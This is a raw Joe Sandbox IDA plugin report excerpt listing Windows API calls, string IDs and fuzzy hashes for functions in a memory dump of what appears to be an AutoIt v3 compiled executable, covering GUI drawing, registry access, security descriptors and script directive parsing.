                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                        • Opcode ID: 83ae692fc4007dc38c8b0004892d8829129de500bff7f2c1e6dad692df63e4a7
                                                                                                                                        • Instruction ID: c5067ec6f7c180c8111cae4d0931759527f7f603f2a63f3e89fdbbce4b4ca474
                                                                                                                                        • Opcode Fuzzy Hash: 83ae692fc4007dc38c8b0004892d8829129de500bff7f2c1e6dad692df63e4a7
                                                                                                                                        • Instruction Fuzzy Hash: 1E618D30605149AFCF04DF25CA81D69B7F0EF19384B3485F6E80AAB2A1DB65ED42DB41
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00BB7421
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00BB7425
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00BB743B
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00BB7446
                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00BB744B
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00BB7463
                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BB7471
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00BB7482
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00BB748B
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00BB7498
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00BB74B7
                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BB74CE
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BB74DB
                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BB752A
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BB7554
                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00BB7572
                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00BB757D
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00BB758E
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00BB7596
                                                                                                                                        • DrawTextW.USER32(?,00BB70F5,000000FF,?,00000000), ref: 00BB75A8
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00BB75BF
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00BB75CA
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00BB75D0
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00BB75D5
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00BB75DB
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00BB75E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                        • Opcode ID: fe27a4378270dc11548d82a70cc5e081fd165b1b1512a26000e83e9300d10789
                                                                                                                                        • Instruction ID: 7245e8733cdc662ff619cd711b33d2df835964af90c54ed32c9994310e7e3c3c
                                                                                                                                        • Opcode Fuzzy Hash: fe27a4378270dc11548d82a70cc5e081fd165b1b1512a26000e83e9300d10789
                                                                                                                                        • Instruction Fuzzy Hash: DD616172904618AFDF11DFA4DC49EEE7FB9EB48320F114255F915BB2A1DBB09940CB90
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BB1128
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BB113D
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00BB1144
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB1199
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BB11B9
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BB11ED
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB120B
                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BB121D
                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00BB1232
                                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00BB1245
                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00BB12A1
                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00BB12BC
                                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00BB12D0
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BB12E8
                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00BB130E
                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00BB1328
                                                                                                                                        • CopyRect.USER32(?,?), ref: 00BB133F
                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00BB13AA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                        • Opcode ID: be389b345f7d5d1c75fbdbd75cb0f346dad95008bd41cb79a4d85213a40650f9
                                                                                                                                        • Instruction ID: ae9bab30a77468b3420a1f0114de01960b08ae3217a79ec48a3e8d7083711be5
                                                                                                                                        • Opcode Fuzzy Hash: be389b345f7d5d1c75fbdbd75cb0f346dad95008bd41cb79a4d85213a40650f9
                                                                                                                                        • Instruction Fuzzy Hash: A7B19E71604351AFD710DF68C895FAABBE4FF88340F40895CF9999B261DBB1E844CB91
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B38968
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00B38970
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B3899B
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00B389A3
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00B389C8
                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B389E5
                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B389F5
                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B38A28
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B38A3C
                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00B38A5A
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00B38A76
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B38A81
                                                                                                                                          • Part of subcall function 00B3912D: GetCursorPos.USER32(?), ref: 00B39141
                                                                                                                                          • Part of subcall function 00B3912D: ScreenToClient.USER32(00000000,?), ref: 00B3915E
                                                                                                                                          • Part of subcall function 00B3912D: GetAsyncKeyState.USER32(00000001), ref: 00B39183
                                                                                                                                          • Part of subcall function 00B3912D: GetAsyncKeyState.USER32(00000002), ref: 00B3919D
                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00B390FC), ref: 00B38AA8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                        • Opcode ID: bdab93088f1fe572438853c65d844718af7ee8c6c60936788c4ddcb4e206733f
                                                                                                                                        • Instruction ID: 9ec0aec3fb63922d526290f6ac9be7e54729d5589119e3fe871cbcc8e9830782
                                                                                                                                        • Opcode Fuzzy Hash: bdab93088f1fe572438853c65d844718af7ee8c6c60936788c4ddcb4e206733f
                                                                                                                                        • Instruction Fuzzy Hash: 4CB16D71A00209DFDB14DFA8CD85BAE3BF5FB48314F108669FA15A7290DBB4E841CB51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B81114
                                                                                                                                          • Part of subcall function 00B810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B81120
                                                                                                                                          • Part of subcall function 00B810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B8112F
                                                                                                                                          • Part of subcall function 00B810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B81136
                                                                                                                                          • Part of subcall function 00B810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B8114D
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B80DF5
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B80E29
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B80E40
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B80E7A
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B80E96
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B80EAD
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B80EB5
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B80EBC
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B80EDD
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00B80EE4
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B80F13
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B80F35
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B80F47
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B80F6E
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80F75
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B80F7E
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80F85
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B80F8E
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80F95
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B80FA1
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80FA8
                                                                                                                                          • Part of subcall function 00B81193: GetProcessHeap.KERNEL32(00000008,00B80BB1,?,00000000,?,00B80BB1,?), ref: 00B811A1
                                                                                                                                          • Part of subcall function 00B81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B80BB1,?), ref: 00B811A8
                                                                                                                                          • Part of subcall function 00B81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B80BB1,?), ref: 00B811B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                        • Opcode ID: ce3baf679a1440b0d532ad1d7a210a3f482d99bf83a095c2934024980ceada4a
                                                                                                                                        • Instruction ID: 18f48200b7e95e2ee0c567f8d6001cf47fd51011866f8c4c6ffca4181bf0b010
                                                                                                                                        • Opcode Fuzzy Hash: ce3baf679a1440b0d532ad1d7a210a3f482d99bf83a095c2934024980ceada4a
                                                                                                                                        • Instruction Fuzzy Hash: 72714C7190020AABDB60EFA4DC44BAEBBB8EF04341F148255FA19B71A1DB719909CB60
                                                                                                                                        APIs
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC4BD
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BBCC08,00000000,?,00000000,?,?), ref: 00BAC544
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00BAC5A4
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAC5F4
                                                                                                                                        • _wcslen.LIBCMT ref: 00BAC66F
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00BAC6B2
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00BAC7C1
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00BAC84D
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BAC881
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BAC88E
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00BAC960
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                                        • Opcode ID: fb3b3958635f289fbf5a0f1b6d8e683fc7a3981237577601828e5b4d66bdaa6e
                                                                                                                                        • Instruction ID: 0544044101150c64ab63bb6a4b64b1343f8a9b0ea58263ec0515d00e1aad4974
                                                                                                                                        • Opcode Fuzzy Hash: fb3b3958635f289fbf5a0f1b6d8e683fc7a3981237577601828e5b4d66bdaa6e
                                                                                                                                        • Instruction Fuzzy Hash: 5D1279356082119FCB14DF14D891A2ABBE5FF89714F14889CF88A9B3A2DB31ED45CB85
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BB09C6
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB0A01
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB0A54
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB0A8A
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB0B06
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB0B81
                                                                                                                                          • Part of subcall function 00B3F9F2: _wcslen.LIBCMT ref: 00B3F9FD
                                                                                                                                          • Part of subcall function 00B82BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B82BFA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                                        • Opcode ID: c05f2fbee3038d89a70b81249f12478dec421b45215412ac2c6bb7b0881da042
                                                                                                                                        • Instruction ID: 879f60e4462f74236501b2eb8207b89473f8f10c841b88b32bce7d824b3328ba
                                                                                                                                        • Opcode Fuzzy Hash: c05f2fbee3038d89a70b81249f12478dec421b45215412ac2c6bb7b0881da042
                                                                                                                                        • Instruction Fuzzy Hash: 34E169312183518FC714EF25C49097AB7E1FF98314B1489EDF89A9B2A2DB71ED45CB81
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                        • Opcode ID: ee22a689adb6341e7de77f538f5cff548c6b417a5bdb7a2d5d9db47a879d9536
                                                                                                                                        • Instruction ID: 94b1353f799f7b1bf482e8aa90beb2a7f888c5606aac91f5a3cfd63cef4afe76
                                                                                                                                        • Opcode Fuzzy Hash: ee22a689adb6341e7de77f538f5cff548c6b417a5bdb7a2d5d9db47a879d9536
                                                                                                                                        • Instruction Fuzzy Hash: 1C71E43360816E8BCB20DE7CC9416BE3BD1EB62764F6505E5F8569B288EB31CD45D3A0
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB835A
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB836E
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB8391
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB83B4
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BB83F2
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00BB361A,?), ref: 00BB844E
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BB8487
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BB84CA
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BB8501
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00BB850D
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BB851D
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00BB852C
                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BB8549
                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BB8555
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                        • Opcode ID: ab33a16a42f5bfc25428b44e7b443a7fff082b9074759dae7dc02f92e877cc63
                                                                                                                                        • Instruction ID: 0f30809fc081a29f4e5406eac851a6a508f1cd64f11e4c4e360fb2f59bd7db27
                                                                                                                                        • Opcode Fuzzy Hash: ab33a16a42f5bfc25428b44e7b443a7fff082b9074759dae7dc02f92e877cc63
                                                                                                                                        • Instruction Fuzzy Hash: AD61AB71540615BBEB24DF64CC81BFA7BECEB18710F104689F815EA1D1DFB4AA90DBA0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                        • API String ID: 0-1645009161
                                                                                                                                        • Opcode ID: 3a38d9ac327f00a1a2a5a9cb727fc659f9e4cbd363b89c779c91a05572f1bc83
                                                                                                                                        • Instruction ID: b2322961681ad2edd4721db25a264a48150ef12d78b76b65db283c3f3defcbb4
                                                                                                                                        • Opcode Fuzzy Hash: 3a38d9ac327f00a1a2a5a9cb727fc659f9e4cbd363b89c779c91a05572f1bc83
                                                                                                                                        • Instruction Fuzzy Hash: 0A81D471684625ABDB20AF61DC42FFE37E8EF15300F0440E4F908AA1A6EF74DA51D795
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B93EF8
                                                                                                                                        • _wcslen.LIBCMT ref: 00B93F03
                                                                                                                                        • _wcslen.LIBCMT ref: 00B93F5A
                                                                                                                                        • _wcslen.LIBCMT ref: 00B93F98
                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00B93FD6
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9401E
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94059
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94087
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
